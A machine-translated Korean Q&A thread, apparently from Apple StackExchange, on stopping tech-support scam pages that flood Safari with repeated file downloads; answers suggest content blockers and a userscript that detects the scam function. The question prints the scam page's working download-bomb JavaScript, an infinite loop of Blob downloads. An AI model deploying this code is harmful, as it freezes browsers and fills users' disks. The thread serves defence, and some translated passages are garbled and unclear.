Safari에서 스팸 다운로드 방지

배경

많은 "질문이있는"사이트 (영화 사이트 등)에 새로운 스팸 페이지가 나타나기 시작했습니다. 이 새로운 스팸 페이지는 가짜 스캔 범주, MacKeeper, "YOU HAVE A VIRUS"등의 범주에 적합합니다.

문제

이 새 페이지의 문제점은 팝업 만있는 대신 페이지가 실제로 ~ 1ms마다 임의의 2kb (임의의 텍스트 만 포함하는) 파일을 반복적으로 다운로드하기 시작한다는 것입니다. 창을 닫고 1000 개가 넘는 파일을 삭제하기 전에 다운로드 폴더가 채워집니다. 페이지 스팸으로 인해 인쇄 대화 상자가 나타나는 유사한 문제와 달리 반응 할 시간이 거의 없습니다.

실패한 문제 해결 시도

• 다운로드 폴더를 잠그려고했습니다. 다운로드가 ... 잘못 ... 다운로드되는 것을 막 으면서 대화 상자 (이미지 참조)가 나타납니다. 일반적 으로이 대화 상자를 닫을 수는 있지만 ~ 1ms마다 다운로드가 시도되므로 닫을 때마다 새 대화 상자가 나타나서 창을 닫을 수 없습니다.

• Safari를 강제 종료하면 다운로드가 중단되지만 (1k 다운로드 후) 다른 모든 창을 느슨하게합니다.

• Safari 환경 설정에서 설정을 '각 다운로드마다 요청'으로 변경합니다. 1k의 개별 대화 상자가 열리면 탭을 닫을 수 없으므로 작동하지 않습니다. 결국 사파리가 충돌합니다.

질문

Safari에서 스팸 다운로드를 방지하려면 어떻게해야합니까?

최신 정보:

다운로드를 유발하는 코드는 다음과 같습니다 (JavaScript를 비활성화하고 코드를 수동으로 살펴봄으로써 얻음).

 function download(g, h, j) {
                var k = new Blob([g], {
                        type: j
                });
                if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
                else {
                        var l = document.createElement("a"),
                                m = URL.createObjectURL(k);
                        l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
                }
        }
        function bomb_ch() {
                var g = Math.random().toString(36).substring(20),
                        h = Math.floor(50 * Math.random() + 25);
                while (true) download(h, g, g)
        }
        function ch_jam() {
                bomb_ch()
        }

참고 : 사용자 정의 페이지에서 JS를 실행하는 데 문제가 있습니다. 다운로드하는 대신 얼어 붙었습니다. setInterval()함수를 호출하는 함수 를 사용하여 다운로드를 에뮬레이트 할 수있었습니다 download.

자세한 정보 : https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/

선택적인 Safari 컨텐츠 차단기 / 자바 스크립트 차단기에 적합한 사례가 아닙니까?

미리 만들어진 규칙을 사용하여 웹 사이트에 코드의 크로스 사이트 스크립팅 / 광고 삽입을 방해 할 수 있는지 확인하려면 Ghostery 가 Mac에서 시작하기에 좋은 장소 일 수 있습니다. 물론 페이지가 해당 콘텐츠를 직접 제공하는 경우 해당 페이지에서 자바 스크립트를 완전히 사용 중지하거나 참고하거나 의도적으로 또는 사용자에게 광고를 판매하여 사이트를 차단하는 사이트를 차단해야합니다. 이 겁과 사기를 감당하십시오.

좀 더 정확하게 알고 싶다면 GreaseMonkey 유형의 사용자 스크립은 충분한 JS 지식으로이 문제를 해결할 수 있습니다.

• https://tampermonkey.net/?browser=safari
• https://www.greasespot.net

@JBis 편집

다음 사용자 스크립트가 페이지를 성공적으로 차단했습니다.

     // ==UserScript==
     // @name         The Bomb Squad
     // @version      0.1
     // @description  Blocks the pages containing any function with the bomb_ch function detailed in /apple/329594/prevent-spam-downloads-on-safari and https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/
     // @author       Josh Brown (@JBis https://apple.stackexchange.com/users/263848/jbis)
     // @match        *
     // @grant        none

    // ==/UserScript==

   if (typeof bomb_ch === "function") {
     document.getElementsByTagName("body")[0].innerHTML="<h1>Page Defused by The Bomb Squad</h1><p>Because it contatained the following
 function(s):  <pre>bomb_ch()</pre> <br>";
    }

참고 : Sp (c) Ammers는 bomb_ch()기능 을 무작위로 지정하여이를 쉽게 우회 할 수 있습니다 .

최신 OS 버전의 Safari는이 문제를 해결하는 데 도움이 될 수 있지만, 이러한 쓰레기를 Mac에 제공하는 사람들이 돈을 벌어야하기 때문에 쉽게 차단하려는 모든 기술에 적응할 수 있습니다. charlatans 가 보일러 실 에서 새 코드를 요리 할 수 있는 것보다 "몰몰"하고 빠르게 적응할 수있는 설정 라이브러리를 유지 관리하는 비즈니스를 지원하는 데 더 많은 비용을 투자하지 않으려는 경우 .

또한이 작업을 수행하는 웹 사이트가 호스트 사용자 중 한 명인 귀하에게 이러한 상황이 발생하고 있다는 것을 알아야하기 때문에 사기꾼의 일부 인지 결정해야합니다.

Safari에는 유능한 광고 차단 기능이 많이 있지만 더 넓은 범위의 확장 기반 컨텐츠 차단 기능에 대한 선택은 훨씬 적습니다. 그중에서도 Ghostery와 uBlockOrigin [ 정보 링크 : https://github.com/gorhill/uBlock 다운로드 링크 : https://safari-extensions.apple.com/?q=ublock%20origin .

편집 : uBlock Origin을 매우 유사한 이름의 uBlock과 혼동하지 마십시오 . 두 제품은 능력과 명성이 상당히 다릅니다.

그들은 당신이 원하는 것을 할 수 있고 친구들이 경험 한 다운로드 폭격을 막을 수 있습니까? 예, Ghostery는 uBlockOrigin이 기본값으로 설정되도록 일부 규칙 사용자 지정이 필요하다는 차이점이 있습니다.

"추가 정보"링크에서 Malwarebytes 발표 1 개월 전에 uBlockOrigin이이 특정 악용을 차단 한 것으로 알고 있습니다. 나는 유령의 타임 라인에 대해 모른다.

나는 그들에게 두 가지 재판을 모두 추천합니다.